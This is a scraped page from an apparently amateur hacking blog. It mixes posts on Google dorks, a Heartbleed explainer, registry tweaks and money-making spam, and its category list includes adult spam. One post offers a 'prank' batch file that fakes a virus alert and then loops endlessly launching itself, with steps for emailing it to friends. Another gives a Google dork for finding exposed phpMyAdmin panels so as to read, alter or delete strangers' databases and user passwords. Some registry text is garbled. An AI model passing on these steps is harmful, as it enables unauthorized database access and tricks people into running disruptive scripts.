Tuesday, 17 January 2017
Thursday, 1 December 2016
Dangerous Google Dorks which will help you to hacking or getting juicy information for further attack on any website or server.
Friday, 10 October 2014
This is the website which offers the free hosting and paid too.
Here you will get all features which you expect from hosting comapany.
Features:
Free cPanel Web Hosting with PHP5/Mysql - no advertising!
We can offer you a free web hosting package packed with advanced features for hosting & building professional dynamic websites. We provide secure free web space with all the web hosting tools you could possibly ever need.
Our package includes:
- 1500 MB of Disk Space, 100 GB Bandwidth
- Host your own domain (http://www.yourdomain.com)
- cPanel Powered Hosting (you will love it)
- Over 500 website templates ready to download
- Easy to use website builder
- Free POP3 Email Box with Webmail access
- FTP and Web based File Manager
- PHP, MySQL, Perl, CGI, Ruby.
- And many more..
To get free hosting click on the above image and register there and create you website. you can create your website with free website builder or you can create you own pages and upload them.
Friday, 5 September 2014
This is Only for prank actually it does not make any harm to your friends computer.
Below are the steps you have to perform to make prank on your friends.
Step 1: Open you notepad or any text editor installed on your computer.
Step 2: Copy the below code to your text editor.
echo WARNING VIRUS HAS BEEN DETECTED
echo System check
echo -
echo -
echo RAM - Corrupted
echo -
echo Norton - FAILED
echo -
echo Virus infecting: ****-****-****-8894
echo -
echo your hard drive corrupted
echo -
PAUSE
echo -
echo Starting to reboot hardrive.
echo -
echo Do not attempt to quit.
echo -
echo Restart after 10 minutes approximately.
PAUSE
:START
start Internet Explorer.bat
GOTO START
Step 3: Save your file now with any name with extension .bat
Step 4: Now send it to any friend through mail. When he/she will click on this file then this batch file will executed automatically.
You can try it on your system. Its not any harmful virus. It just a prank.
Wednesday, 30 July 2014
What is Hacker?
Hacker is person like Us, But he or she has great ability to think out of the box. He can think differently than other.
We can take hacker as in our daily life because if you know your work very well than others then are the hacker of that work.
But Here we are taking hacker in field of Web application hacking, Network hacking etc. So to be hacker he or she has to be the good knowledge of programming skills, different Operating system, Networking, protocols, understanding of application you are going to hack. To become a complete hacker is not an easy task. Hacker have to keep update himself from New vulnerability, New attacks, Bypass, attack vectors, New technology in web application, etc. So they have to study alot, research.
Skills Need to Become Hacker
- Understanding of programming concepts
- Operations of different Operating System
- A lot of Patience
- Understanding of application architecture
- Understanding of SQL
- And keep researching
You can Start Hacing with google hacking
Then After you explore differne type of vulnerability. Here you learn how to attack on application what are the different attacker, Vulnerability etc.
To be the best hacker always keep researching that what new technologies comming into the market, What new attacks are possible, New vulnerabilities are comming.
If i forget somthing then comment me i will update
Note: Do Not perform attacks on real live website otherwise you will be behind the bars. I am not responsible. This tutorial is for Educational purpose only.
Friday, 4 July 2014
Google Dorks | Google hacking
This post is also written by me on my website you can check out -Google Dorks
May be many of you don't know how google search engine power. Most of the time when you search any unusual thing on the google or any search engine you did't get perfect result that you want so at that time what can you do? and how you can get more accurate result from google search.
This post is all about Google hacking. Google hacking doesn't mean i am going to tell you how to hack google website or google server.
Google hacking real mean is how we can make our search more accurate and how can we decrease the number of search result so that we can get what we want using google dorks.
What is google dorks
Google dorks is also a query to the google but these are not usual as we all write to search on google. Google dorks are the filters which filter the unwanted search results and reduce the number of search result and make efficient search result. Click on the link to see full post google dorks
Thursday, 17 April 2014
How to hack - Website with Google Dork
How TO Hack Any Website with Google Dork
This hack is done by an exploit called PHPmyadmin Exploit.
Introducing the Dork: allinurl:index.php?db=information_schema
Using this dork you can bypass username and password and can also edit schema of that website.
You can see whole database or edit or delete it without knowing admin panel username and password.
Tutorial
Search on google: allinurl:index.php?db=information_schema
After that you will get many results. you can choose any one.
and click on the link.
Bingo!!!!!
Now you have the whole database of the website. Now you can do whatever you want. You can see the admin username by just finding users table in the database. you can see and update , delete the record in the database. for that you need some knowledge of databse or phpmyadmin.
what you can do Now?
- you can see all username and password of users using this hack .
- you can edit database of that website using this hack.
- you can delete the tables and data using this hack.
- you can also compromise the server using this hack.
The Heartbleed Bug
Heartbleed is vulnearbility in the very popular Openssl cryptographic software.
This vulnerability allows the attacker to steal the users's information. SSL/TSL provides the communication security and privacy over the internet applications such as, web , email, and VPN,
Heartbleed allows everyone to read memory of the system protected by the vulnerable version of OpenSSL.
This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.
Am I affected by the bug?
You are likely to be affected either directly or indirectly. OpenSSL is the most popular open source cryptographic library and TLS (transport layer security) implementation used to encrypt traffic on the Internet. Your popular social site, your company's site, commerce site, hobby site, site you install software from or even sites run by your government might be using vulnerable OpenSSL. Many of online services use TLS to both to identify themselves to you and to protect your privacy and transactions. You might have networked appliances with logins secured by this buggy implementation of the TLS. Furthermore you might have client side software on your computer that could expose the data from your computer if you connect to compromised services.
How to Find Out if Heartbleed Affects You
There are a few free resources available to help you with this:
McAfee Heartbleed checker
fillipo heartbleed checker
lastpass heartbleed checker
Change your password
If you are using your old password till now for different websites like email, Instant messanger, Admin panel,etc
Then its time to change your password.
More on Heartbleed
Official website
Saturday, 1 February 2014
Monday, 23 December 2013
Hello guys I am here for you guys,
Now Get online job, like following:
- Online Part time coder job.
- POST YOUR PROJECT FREE
- GET FREE CODERS
- AFFILATE MARKETING
- GET PROGRAMMER JOBS
- REQUIRE PROGRAMMERS
Just Click on any of the image:
Monday, 7 October 2013
several customization options that make it one of the most user friendly
operating systems in the world. However, computer geeks would still love to
hack the windows registry so as to add more extra features and functionalities
to their operating system.
in your own way, here is a list of 8 interesting registry hacks that you need
to try.
the computer. This can be really handy if the compute is on a public pace where
the chances of virus and other malware infection is really high. You can easily
disable access to USB ports with the following registry hack:
Registry Editor (start->Run->Type regedit and hit Enter)
registry, navigate to the following key:
right-side pane, double-click on “Start”.
“Value data” field enter 4 and click on “OK”
Registry Editor and reboot.
except n the step-4 enter 3 in the “Value data” field.
and 7.
keep popping up frequently with warning messages and reminders. Here is s a step by step procedure to do that:
“DWORD”.
the “Value data” to 0.Reboot the compute to see the changes in effect.
then this tutorial is for you.
Registry Editor and navigate to following key:
key with the following name :{ 645ff040-5081-101B-9F08-00AA002F954E}
This should show up the Recycle Bin” icon
limit access to your computer by disabling the Task Manager?
Registry Editor and navigate to the following key:
key as System.
“System” as it is already present in it. So, you can directly navigate to :
HKEY_CURRENT-USER
the step-1
DisableTaskMgr.
“Value data” to 1 (0=Enable, 1=Disable).
and 7
owner on your computer:
Registry Editor and navigate to:
RegisteredOrgannization.
want.
“Properties”.
and 7
without the need for using the start-up folder. Here is a way to do this:
rename it to the name of the program that you want to add (you can give any name,
it doesn’t matter).
add the path of the executable program that has to execute at startup.
and vista:
access to it ?
so that you can plug your favorite
folders to start menu .
follows:
down the Shift key and right-click on the folder. You should click on the
folder. You should see the “Pin to Start Menu”
it’s title bar and shake it.
really a handy feature! However, if you ever wanted to disable this feature,
here is a solution:
called NoWindowMinimizingSortcuts and set it’s value to 1.
changes in effect.
Friday, 4 October 2013
ONLINE MONEY MAKING
Online money making is too Easy now.You can make money online by just clicking on ads.
I know you are thinkig that its fake and these websites are only fake and dont'pay anything.
But there is one site which pay really.
This websitereally pay on weekly basis.
you can try this to make money online from your home.
One feature of this website is that it pay out from check also so you don't need to worry that your paypal account will get hacked or they steal money from your account.
Click Here
to Register and start earning today..
Thursday, 25 April 2013
Thursday, 18 April 2013
Search
Categories
- After Effects Animation
- Animation
- Batch Virus
- blacklisted websites
- broadband hack
- Download HD Images
- Earn Paytm Cash
- Free Images
- Free Images Download
- Free Internet
- Free Web Hosing
- giveaway
- google dorks
- Google Hacking
- HACK CCTV CAMERA
- hacking
- HD Free Images
- heartbleed
- hidden password
- Hot Sunny Leone
- how to become hacker
- How to change mac address in backtrack 5
- Logo Animation
- Make virus
- MLM
- Online money making
- Paytm Cash
- pentesting ios application
- registery hack
- Registry hacking
- remote hacking
- secure password
- Sexy Babe
- Sexy Babe Strip
- Social Media Marketing
- Social Media Marketing Tips
- Sunny Leone
- Sunny Leone Nude
- Teasing
- Tips
- Witgie Giveaway